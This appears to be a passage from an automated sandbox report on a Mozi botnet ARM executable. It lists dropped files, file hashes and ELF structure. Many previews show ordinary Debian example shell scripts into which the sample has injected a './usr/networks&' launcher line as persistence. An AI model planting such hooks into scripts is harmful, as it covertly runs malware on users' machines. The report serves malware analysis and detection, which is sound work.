                                                                                                                  Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):617
                                                                                                                  Entropy (8bit):4.789300168717738
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                                  MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                                  SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                                  SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                                  SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1015
                                                                                                                  Entropy (8bit):4.896629241453442
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                                  MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                                  SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                                  SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                                  SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                                  /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):461
                                                                                                                  Entropy (8bit):5.204671186006819
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                                  MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                                  SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                                  SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                                  SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):92
                                                                                                                  Entropy (8bit):4.373538165973413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                                  MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                                  SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                                  SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                                  SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):519
                                                                                                                  Entropy (8bit):5.218301073324955
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                                  MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                                  SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                                  SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                                  SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):633
                                                                                                                  Entropy (8bit):4.881818972878624
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                                  MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                                  SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                                  SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                                  SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.736279036741599
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                                  MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                                  SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                                  SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                                  SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2712
                                                                                                                  Entropy (8bit):5.4524991837552035
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                                  MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                                  SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                                  SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                                  SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                  /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2564
                                                                                                                  Entropy (8bit):5.346461718403454
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                                  MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                                  SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                                  SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                                  SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                  /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9649
                                                                                                                  Entropy (8bit):5.350733164859712
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                                  MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                                  SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                                  SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                                  SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                                  /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):46
                                                                                                                  Entropy (8bit):3.925523369006428
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                  Entropy (8bit):5.819679405566689
                                                                                                                  TrID:
                                                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                  File name:mozi.a.zip
                                                                                                                  File size:307960
                                                                                                                  MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                                  SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                                  SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                                  SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                                  SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                  File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                                  Static ELF Info

                                                                                                                  ELF header

                                                                                                                  Class:ELF32
                                                                                                                  Data:2's complement, little endian
                                                                                                                  Version:1 (current)
                                                                                                                  Machine:ARM
                                                                                                                  Version Number:0x1
                                                                                                                  Type:EXEC (Executable file)
                                                                                                                  OS/ABI:UNIX - System V
                                                                                                                  ABI Version:0
                                                                                                                  Entry Point Address:0x8194
                                                                                                                  Flags:0x4000002
                                                                                                                  ELF Header Size:52
                                                                                                                  Program Header Offset:52
                                                                                                                  Program Header Size:32
                                                                                                                  Number of Program Headers:5
                                                                                                                  Section Header Offset:307280
                                                                                                                  Section Header Size:40
                                                                                                                  Number of Section Headers:17
                                                                                                                  Header String Table Index:16

                                                                                                                  Sections

                                                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                  NULL0x00x00x00x00x0000
                                                                                                                  .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                                  .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                                  .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                                  .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                                  .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                                  .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                                  .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                                  .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                                  .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                                  .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                                  .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                                  .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                                  .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                                  .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                                  .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                                  .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                                  Program Segments

                                                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                  EXIDX0x405800x485800x485800x1280x1280x4R 0x4.ARM.exidx
                                                                                                                  LOAD0x00x80000x80000x406a80x406a80x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                                  LOAD0x410000x510000x510000x9fa80x2fb380x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                                  TLS0x410040x510040x510040x00x80x4R 0x4
                                                                                                                  GNU_STACK0x00x00x00x00x00x7RWE0x4

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
